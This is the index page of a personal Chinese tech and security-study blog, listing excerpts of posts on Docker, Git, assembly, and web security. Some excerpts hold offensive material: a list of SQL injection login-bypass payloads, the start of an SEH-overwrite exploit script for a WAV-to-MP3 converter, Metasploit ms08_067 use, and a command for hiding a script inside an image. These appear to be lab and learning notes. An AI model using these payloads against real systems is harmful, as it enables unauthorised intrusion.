JacobTsang的博客

原创 Centos 下 Dfinity 公链网络部署

终端1：[root@swarm ICP]# sh -ci "$(curl -fsSL https://sdk.dfinity.org/install.sh)"[root@swarm ICP]# dfx new hello[root@swarm ICP]# cd hello/[root@swarm ICP]# dfx startCannot find dfx configuration file in the current working directory. Did you forget to.

原创 Docker端口映射后本地可访问，但公网无法访问

https://stackoverflow.com/questions/43244074/cant-access-publicly-exposed-docker-container-port-from-external-machine-only-p 127.0.0.1:7091:7091 不代表将端口映射公开化（不可）-p 7091:7091 和 -p 0.0.0.0:7091:7091 皆可

原创 Internet Settings | proxy服务器端口被持续劫持到特殊端口

每次我过FW的时候，就给我把代理端口给改成了127.0.0.1:1081，然后脚本地址改成1082/pac/?t=132628。我仔细一想这应该是以前v2ray的PAC(proxy auto config)配置残留。内心一万句mmp，啥啊，这玩意到现在都还有残留，这么毒吗？但不可能啊！我的v2ray早卸了。于是想着，这玩意应该把我注册表改了？去以下路径找找吧。HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet .

原创 excel 无法使用 ctrl + enter 填充空值

检查自己的excel文件格式是否是xls若是，另存为为xlsx格式，重新打开即可使用此快捷键。

原创 matasploit框架漏洞利用

Kali：192.168.163.144XP：192.168.163.136XP关闭防火墙，测试两机器是否ping通。msf > search ms08_067[!] Module database cache not built yet, using slow searchMatching Modules================ Name ...

原创 Visual Studio 和 Visual Studio Code的区别?

Visual Studio 是一个全能的，方便的开发环境。即 IDE。Visual Studio Code( VSCode )只是一个跨平台的编辑器，但是用户可以根据自己的需求去增加插件。Visual Studio允许自己定制一个适合自己的UI界面。 因此也可以说 VS Code is code editor like Visual Studio without the Visual!相对来...

原创 flask学习

from flask import Flaskimport osapp = Flask(__name__)#以__name__实例化的原因：#1、方便flask框架去寻找资源#2、方便flask插件出错的时候排错@app.route('/') # route() 装饰器告诉 Flask 什么样的URL 能触发我们的函数# Python中‘@’开头的都是装饰器def hello_...

原创 .NET framework 是什么? 有何意义?

.NET is a framework that Microsoft has introduced to develop applications easily. A framework can be understood as a collection of Application Programming Interfaces (APIs) and a set of code that a pr...

原创 Wireshark修改数据包

新版本不行。旧版本可以：https://www.wireshark.org/download/win64/all-versions/Wireshark-win64-1.12.8.exe

原创 Git学习笔记

利用Git进行协同开发：例如项目主线master起始就有两个文件：1.txt / 2.txt 。分三个team进行开发不同功能。branch1首先开发好了4.txt。branch3比较懒，啥也没干。branch2第二个开发好了最后一个功能3.txt。于是branch2需要在branch1的基础上进行rebase，merge。最后release。版本稳定后，再merge到master上。ma...

转载 DOSBOX 查看 FLAG寄存器

原创 密码学 | 加盐

What is MD5 Salt and How to Use It?In cryptography, salt is a random string that you add to an input word, to generate a different hash that with the word alone.在密码学中，盐是一个随机的字符串，你可以将盐加到你所输入的字符串中，(密码...

原创 Kali Linux 安装 arm-linux-gcc交叉编译工具

┗|｀O′|┛ 嗷~~ 安装的虚拟机太多了，我不。果断继续用我的小Kali。但接下来要运行的命令是arm-linux-gcc而非gccgcc是Kali自带的X86架构的编译器，而非arm。root@localhost:mkdir /usr/local/arm root@localhost:mv tar -zxvf arm-linux-gcc-4.5.1-v6-vfp-20101103.t...

转载 makefile编写规则

https://blog.csdn.net/darmao/article/details/81077055

原创 汇编实现登陆界面密码无回显

.486DATA SEGMENT USE16BUF1 DB 255 ;用于存取键入的用户名 DB ? DB 255 DUP(?) BUF2 DB 255 ;用于存取键入的密码 DB ? DB 255 DUP(?) USER DB 'Jacob' ;用户名内置校验值 ;4A 61 63 6F 62 LEN1 = $-USER ;内置用户名长度PASSWD ...

原创 sql报错注入原理分析

研究人员发现，使用group by子句结合rand()函数以及像count（*）这样的聚合函数，在SQL查询时会出现错误，且错误是随机产生的，这就产生了双重查询注入。到底为什么floor()、rand(0)、count()、group by相结合，会产生这种错误呢？转载以前乌云一位哥的文章：种子值为0的rand()函数的输出几乎固定为01101Okay let get is strai...

原创 SQL注入 | mysql写入文件 | 读取文件

mysql 新版本下secure-file-priv字段 ： secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。ure_file_priv的值为null ，表示限制mysqld 不允许导入|导出。当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生...

原创 sql | “弱类型” | 隐匿转换

mysql> desc users;+----------+-------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+----------+-------------+------+-----+-----...

原创 SQL注入万能密码字典

"or "a"="a'.).or.('.a.'='.a or 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#admin'/*aaaa*/''or 1=1/*"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1...

转载 Session和Cookie的区别

https://blog.csdn.net/zwq912318834/article/details/79571110

原创 CTF | 你好慢啊 | python post data

import requestsimport hashlibimport reurl="xxxxx"r=requests.session()out=r.get(url)rr = re.compile(r"<h3 align='center'>(\S+)</h3>", re.I)str1 = rr.findall(out.text)str2=hashlib...

原创 寻找sql注入点

1、GoogleHacking撒网2、特定站点：源代码Ctrl + F ：php?id=

原创 目录扫描

1、御剑 ( 国内站 )2、dirsearch ( 国外站 )#git clone https://github.com/maurosoria/dirsearch#cd dirsearch/#python3 dirsearch.py -u "http://localhost/" -e *参数列表：-h, --help 查看帮助-u URL, --url=URL 设置url...

原创 Chrome 开发者工具官方文档

https://developers.google.com/web/tools/chrome-devtools

原创 Boxoft wav to mp3 converter SEH bypass technique tested on XP SP3

#一定要用Python2进行编译。否则Exploit无效。Python2 Exploit：f = open("Expolit.aiff", "w")f.write("A" * 4132) # 4136 - 4f.write("\xeb\x06\x90\x90") # jmp 06 nop nopf.write("\xa4\x43\x40\x00") # 构造 pop pop ret ...

原创 win2000下实现绕过SEH机制栈溢出弹出计算器

实验出处：《0day安全：软件漏洞分析技术（第2版）》实验环境：步骤一：VMware中安装Windows 2000 server镜像链接:https://pan.baidu.com/s/1OREE1sMnwZWm06sJEYQDLA提取码：2zya安装vmtools前要以挂在ISO的方式打个补丁补丁链接：https://pan.baidu.com/s/10UUB5VwjVJ14l...

原创 图片隐写 | 图片马制作

cmd下执行：copy x.gif /b + x.txt /a y.gif

原创 Masm for Windows集成环境 DOSBox界面太小 | 找不到Doxbox.option

Masm for windows download link:链接: https://pan.baidu.com/s/11OIJKh_Ww2U3DeG5CNriFA 提取码: cf3x编写汇编语言最好用的IDE莫过于微软公司的集成环境，内嵌一个DOSBox。解决在DOSBOX下.586，USE16报错的问题。但是如何修改内嵌DOXBox的界面大小呢？如图下所示。windowresolutio...

原创 Linux加固 | Ubuntu修改.bash_history的默认保留历史命令行数

cat ~/.bash_historyvim /etc/bash.bashrc

原创 Docker架设内网主机并映射80端口到公网

root@VM-0-3-ubuntu:/# curl -fsSL https://get.docker.com | sh #下载Dockerroot@VM-0-3-ubuntu:/# systemctl start docker #启动Dockerroot@VM-0-3-ubuntu:/# systemctl status docker #查看Docker运行状态roo...

原创 GET可传参到后台而，POST无法传数据到后台。

原因：不可以只改左上角的GET。要change request method，因为POST传参默认是带着content-type的，不写则后台无法处理这个包。

原创 汇编实验1

（1）要求实验者按照原样对源程序进行编辑，汇编后，根据TASM给出的错误信息对源程序进行修改，直到没有语法错误为止。然后进行链接，并执行相应的可执行文件。正确的执行结果是在屏幕上显示：25+9=34。DATA SEGMENT SUM DB ?,?MESG DB '25+9=' DB 0,0,'$'N1 DB 9,0F0HN2 DW 25DATA ENDSCODE...

原创 MySQL | SQLserver 默认数据库 默认表

MySQL的默认数据库默认数据库分类：information_schemaperformance_schemamysqltestinformance_schema保存了MySQl服务所有数据库的信息。具体MySQL服务有多少个数据库，各个数据库有哪些表，各个表中的字段是什么数据类型，各个表中有哪些索引，各个数据库要什么权限才能访问。mysql保存MySQL的权限、参数、对象和...

原创 常用漏洞平台

美国1, 赛门铁克的漏洞库 https://www.securityfocus.com/2, 美国国家信息安全漏洞库 https://nvd.nist.gov/3, 全球信息安全漏洞指纹库与文件检测服务 http://cvescan.com4, 美国著名安全公司Offensive Security的漏洞库https://www.exploit-db.com/5，CVE(美国国土安全资助的...

原创 Google Hacking

转载 网络信息安全答案

https://blog.csdn.net/qq_37865996/article/details/85346003

原创 打开非官方可执行文件的正确姿势

1、上传到云端容器进行病毒分析，常规杀毒软件只要稍微涉及一点内核操作就会报毒。https://www.virustotal.com/gui/home/uploadhttps://habo.qq.com/2、放到虚拟机或容器里运行...

转载 各种类型文件头标准编码

JPEG (jpg)，文件头：FF D8 FFPNG (png)，文件头：89 50 4E 47 【参考：png文件头详解】89 50 4e 47 0d 0a 1a 0aGIF (gif)，文件头：47 49 46 38Windows Bitmap (bmp)，文件头：42 4D [参考：bmp文件格式详解]42 4D 36 0C 30 00 00 00 00 00 36 00 00...

转载 SQl注入 | 数字型 | 字符型

Sql注入：就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。通过构造恶意的输入，使数据库执行恶意命令，造成数据泄露或者修改内容等，以达到攻击的目的。主要是由于应用程序对用户的输入没有进行严格的过滤而造成的。一、万能密码在说sql注入分类之前，先来看一下万能密码的构成原理。万能密码是由于某些程序，通过采用判断sql语句查询结果的...

原创 gdb pattern_create | pattern_offset

gdb-peda$ pattern_create 200gdb-peda$ pattern_offset 0x47414131首先寻找多少字节能溢出切刚好能够覆盖return addr。我们使用gdb-peda提供的pattern_create和pattern_offset。pattern_create是生成一个字符串模板输入后根据EIP来确定覆盖return addr的长度。cat /p...